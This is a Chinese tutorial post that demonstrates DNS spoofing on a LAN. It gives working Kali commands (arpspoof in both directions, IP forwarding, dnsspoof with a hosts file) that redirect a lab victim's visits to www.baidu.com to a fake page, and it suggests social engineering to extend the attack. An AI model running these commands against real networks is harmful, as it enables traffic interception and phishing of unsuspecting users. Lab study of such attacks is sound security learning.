<返回更多

DNS域名攻击演示——“劫持”正常网页实现恶意重定向

2020-02-11    
加入收藏

本文仅用于讨论网络安全技术,以保护信息安全为目的,请勿用于非法用途!

DNS域名攻击演示——“劫持”正常网页实现恶意重定向

DNS域名解析服务

DNS缓存攻击原理

除了ARP缓存攻击,还可欺骗域名服务器(DNS)的缓存条目(从域名到IP地址的映射)。我们需要实现当目标访问某些特定网站时,我们把这些流量转发到一个被我们控制的站点。

ARP解析协议处理的是IP和mac地址之间的关系。

DNS映射(解析)处理的是把www.xxx.com之类的域名解析到相应的IP地址上。

DNS域名攻击演示——“劫持”正常网页实现恶意重定向

DNS解析原理

总之,实际中我们在上网的时候,都是请求域名(比如www.baidu.com),然后域名在本地DNS缓存中寻找域名对应的IP地址,如果找不到,就继续去远程DNS服务器中寻找该域名的IP,一旦找到,也就完成了域名到IP访问的解析,实现了访问域名,其实就是访问域名与之绑定的IP。

如下图:

显示www.toutiao.com域名对应的IP有很多(使用了CDN,不一定是服务器IP

DNS域名攻击演示——“劫持”正常网页实现恶意重定向

kali下nslookup查询IP

最终,用户就可以在不需要知道确定IP的情况下通过URL实现网站的访问(大多数网站使用IP是无法访问的)

入门(DNS缓存攻击)

DNS缓存攻击就是使用主机发送一堆的DNS域名解析指向一个错误ip(我们kali的IP),也就是说让他人访问www.baidu.com时,本地DNS域名解析服务器将该域名指向我们的kali ip,那么他人自动就会链接到我们的kali主机设置的冒牌baidu页面。

首先,要在kali上开启Apache2服务:

在kali终端下输入:

service apache2 start

为什么要开启这个呢,我们要在这里kali的apache2服务器中放入我们的冒牌baidu网页(你可以随便去网上复制一个,也可以自己制作一个)

在卡里的主目录下,找到"其他位置",找到"计算机",然后在里面找到该路径"usr/www/html"目录(一定要参考视频去找到!)

将html目录中的所有文件都删掉!然后放置一份index.html(html超文本网页代码)的文件,该文件内容如下:

<!DOCTYPE html>

<html>

<head>

<meta http-equiv="content-type" content="text/heml; charset=utf-8">

<title>关注今日头条号——“骆训森”</title>

<meta name="keywords" content="test">

<meta name="description" content="test website">

</head>

<body>

<h1>欢迎大家学习kali渗透测试课程!</h1>

</body>

<footer>

<p>By 骆训森 原创制作</a>

</footer>

</html>

 

DNS域名攻击演示——“劫持”正常网页实现恶意重定向

 

需要这个index.html文件的,已经放在会员群云盘共享文件夹中!需要可以关注我,然后私信我获取即可!

创建一个DNS域名解析的文件(我们随便冒牌一个真实存在的域名网址www.baidu.com)

在kali终端中输入:

echo 192.168.31.206 www.baidu.com > hosts.txt

这里是将"192.168.31.206 www.baidu.com"写入文件hosts.txt中,如果hosts.txt不存在,就会自动创建的!

如下图,首先往文件写入域名解析,然后使用cat查看是否写入成功!

DNS域名攻击演示——“劫持”正常网页实现恶意重定向

 

开始DNS欺骗攻击

首先要在kali中开启路由转发:

在kali的终端下输入

echo 1 > /proc/sys/net/ipv4/ip_forward

开启目标靶机(ubuntu)和网关之间的流量劫持:

在kali终端下输入

arpspoof -i eth0 -t 192.168.31.178 192.168.31.1

arpspoof -i eth0 -t 192.168.31.1 192.168.31.178

接着使用dnsspoof工具进行DNS欺骗

在kali的终端下输入

dnsspoof -i eth0 -f hosts.txt

DNS域名攻击演示——“劫持”正常网页实现恶意重定向

 

上面以及开启了DNS欺骗攻击,达到使目标ubuntu访问www.baidu.com时出现我们设置的冒牌页面的目的。

先别急,先在ubuntu中ping下www.baidu.com域名的ip值

发现了啥?www.baidu.com的ip怎么变成了kali的ip呢?这就表明ubuntu此时只要通过浏览器访问www.baidu.com这个网址,不会跳动真正的baidu页面,而是重定向到我们这台恶意的服务器kali apache2中的var/www/html/中的index.html所展现的网页页面!

DNS域名攻击演示——“劫持”正常网页实现恶意重定向

重定向到我们的kali的ip

我们来使用ubuntu的火狐浏览访问www.baidu.com网址验证下:

仔细看看,明明访问的是www.baidu.com,可是这里显示的是我kali自己配置的网页!脑洞大开!突然邪恶了下!要知道,实际应用中并不用触碰目标主机!(目前仅限局域网主机)

DNS域名攻击演示——“劫持”正常网页实现恶意重定向

自动访问到我们的kali web页面

这可不是真正的www.baidu.com主页啊!

到目前为止,我们已经学会了使用DNS缓存欺骗攻击!让目标主机访问的特定页面重定向到我们kali的主机下,真是很好玩!另外这里我们可以选择社工方法将你要他人打开的连接,他人会以为是正常网页,每想到一打开就会定向到你kali主机的虚假主页中,其余的大家自行发挥吧!

再次重申,请勿用于恶作剧和非法使用!否则后果自负!

声明:本站部分内容来自互联网,如有版权侵犯或其他问题请与我们联系,我们将立即删除或处理。
▍相关推荐
更多资讯 >>>